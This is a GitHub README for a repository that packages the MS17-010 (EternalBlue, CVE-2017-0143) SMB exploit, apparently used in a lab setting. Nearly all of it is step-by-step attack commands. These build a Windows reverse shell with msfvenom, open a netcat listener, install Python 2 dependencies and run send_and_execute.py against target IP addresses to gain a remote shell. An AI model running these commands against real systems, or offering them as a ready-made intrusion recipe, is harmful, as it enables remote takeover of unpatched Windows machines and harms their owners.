Skip to content

c0d3cr4f73r/MS17-010_CVE-2017-0143

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

12 Commits
 
 
 
 
 
 
 
 
 
 
 
 

Repository files navigation

MS17-010

🖥️ -c0d3cr4f73r- #️⃣ CVE-2017-0143

Method 1

git clone https://github.com/c0d3cr4f73r/MS17-010_CVE-2017-0143.git
cd MS17-010_CVE-2017-0143/
msfvenom -p windows/shell_reverse_tcp LHOST=10.10.14.9 LPORT=1337 -f exe -o ms17-010.exe

create a nc listner

nc -nlvp 1337

exploit

python2.7 send_and_execute.py 10.129.163.162 ms17-010.exe

image

Incase if you get a error like this folow these steps:

cd MS17-010_CVE-2017-0143/
sudo python2.7 get-pip.py
pip2.7 install --upgrade setuptools
python2.7 -m pip install impacket

Now we can run the exploit : image

image

Method 2

Now this exploit is created in python2 and it require some libraries like impacket , pycrypto . For that virtual environment has to setup and here virtualenv program help .Once you created the environment then you can activate that environment using source utility program . Here python2 is used as interpreter because in latest Kali python3 is set as global interpreter and our exploit is in python2 .

why we use virtual environment ? For that you can check out this . https://www.dabapps.com/blog/introduction-to-pip-and-virtualenv-python/

virtualenv -p python2 venv
source venv/bin/activate
pip install impacket
pip install pycrypto

image

image

python checker.py 10.10.10.4

image

msfvenom -p windows/shell_reverse_tcp LHOST=10.10.14.12 LPORT=4445 -f exe > shell.exe

image

python send_and_execute.py 10.10.10.4 shell.exe 445 browser

image

nc -nlvp 4445

image

About

No description, website, or topics provided.

Resources

Stars

Watchers

Forks

Releases

No releases published

Packages

No packages published

Languages